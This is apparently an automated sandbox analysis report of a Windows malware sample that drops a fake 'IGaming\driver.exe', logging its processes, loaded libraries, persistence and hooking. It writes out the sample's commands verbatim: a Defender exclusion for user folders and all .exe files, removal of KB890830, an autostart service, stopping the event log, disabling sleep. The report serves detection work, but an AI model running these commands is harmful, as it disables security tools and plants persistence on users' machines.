Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LightService"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LightService"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\IGaming\driver.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
          Source: C:\ProgramData\IGaming\driver.exe Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
          Source: file.exe Static file information: File size 2867712 > 1048576
          Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x2b1e00
          Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ~1.PDB @ source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\dialer.exe Code function: 45_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 45_2_00000001408460F0
          Source: file.exe Static PE information: section name: .00cfg
          Source: driver.exe.0.dr Static PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF749F41394 push qword ptr [00007FF749F4B004h]; ret 0_2_00007FF749F41403
          Source: C:\Windows\System32\winlogon.exe Code function: 21_2_000001E85896ACDD push rcx; retf 003Fh 21_2_000001E85896ACDE
          Source: C:\Windows\System32\winlogon.exe Code function: 21_2_000001E85899C6DD push rcx; retf 003Fh 21_2_000001E85899C6DE
          Source: C:\Windows\System32\winlogon.exe Code function: 21_2_000001E8589CACDD push rcx; retf 003Fh 21_2_000001E8589CACDE
          Source: C:\ProgramData\IGaming\driver.exe Code function: 26_2_00007FF7F4F21394 push qword ptr [00007FF7F4F2B004h]; ret 26_2_00007FF7F4F21403
          Source: C:\Windows\System32\lsass.exe Code function: 27_2_00000140ADFDACDD push rcx; retf 003Fh 27_2_00000140ADFDACDE
          Source: C:\Windows\System32\lsass.exe Code function: 27_2_00000140AE87C6DD push rcx; retf 003Fh 27_2_00000140AE87C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 30_2_00000195DD5AACDD push rcx; retf 003Fh 30_2_00000195DD5AACDE
          Source: C:\Windows\System32\svchost.exe Code function: 30_2_00000195DD5DC6DD push rcx; retf 003Fh 30_2_00000195DD5DC6DE
          Source: C:\Windows\System32\dwm.exe Code function: 31_2_000001160C9FACDD push rcx; retf 003Fh 31_2_000001160C9FACDE
          Source: C:\Windows\System32\dwm.exe Code function: 31_2_000001160CA2C6DD push rcx; retf 003Fh 31_2_000001160CA2C6DE
          Source: C:\Windows\System32\dialer.exe Code function: 44_2_0000000140001394 push qword ptr [0000000140008004h]; ret 44_2_0000000140001403
          Source: C:\Windows\System32\svchost.exe Code function: 46_2_00000257E108ACDD push rcx; retf 003Fh 46_2_00000257E108ACDE
          Source: C:\Windows\System32\svchost.exe Code function: 46_2_00000257E10BC6DD push rcx; retf 003Fh 46_2_00000257E10BC6DE
          Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001F28C1EACDD push rcx; retf 003Fh 47_2_000001F28C1EACDE
          Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001F28C94C6DD push rcx; retf 003Fh 47_2_000001F28C94C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 48_2_000001CA97FEACDD push rcx; retf 003Fh 48_2_000001CA97FEACDE
          Source: C:\Windows\System32\svchost.exe Code function: 48_2_000001CA9855C6DD push rcx; retf 003Fh 48_2_000001CA9855C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 49_2_000001D2652FACDD push rcx; retf 003Fh 49_2_000001D2652FACDE
          Source: C:\Windows\System32\svchost.exe Code function: 49_2_000001D26532C6DD push rcx; retf 003Fh 49_2_000001D26532C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 50_2_00000254A27EC6DD push rcx; retf 003Fh 50_2_00000254A27EC6DE
          Source: C:\Windows\System32\svchost.exe Code function: 51_2_0000024B87DEC6DD push rcx; retf 003Fh 51_2_0000024B87DEC6DE
          Source: C:\Windows\System32\svchost.exe Code function: 52_2_00000205FB3DACDD push rcx; retf 003Fh 52_2_00000205FB3DACDE
          Source: C:\Windows\System32\svchost.exe Code function: 52_2_00000205FD41C6DD push rcx; retf 003Fh 52_2_00000205FD41C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 53_2_000001A2056BC6DD push rcx; retf 003Fh 53_2_000001A2056BC6DE
          Source: C:\Windows\System32\svchost.exe Code function: 54_2_0000018EC1F4ACDD push rcx; retf 003Fh 54_2_0000018EC1F4ACDE
          Source: C:\Windows\System32\svchost.exe Code function: 54_2_0000018EC1F7C6DD push rcx; retf 003Fh 54_2_0000018EC1F7C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 55_2_0000025CE3BDACDD push rcx; retf 003Fh 55_2_0000025CE3BDACDE
          Source: C:\Windows\System32\svchost.exe Code function: 55_2_0000025CE3E1C6DD push rcx; retf 003Fh 55_2_0000025CE3E1C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 56_2_000002623896ACDD push rcx; retf 003Fh 56_2_000002623896ACDE
          Source: C:\Windows\System32\svchost.exe Code function: 56_2_000002623899C6DD push rcx; retf 003Fh 56_2_000002623899C6DE

          Persistence and Installation Behavior

          Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\ProgramData\IGaming\driver.exe File created: C:\Windows\TEMP\ftnvuqwjtdwb.sys
          Source: C:\ProgramData\IGaming\driver.exe File created: C:\Windows\Temp\ftnvuqwjtdwb.sys
          Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\IGaming\driver.exe
          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LightService"

          Hooking and other Techniques for Hiding and Protection

          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
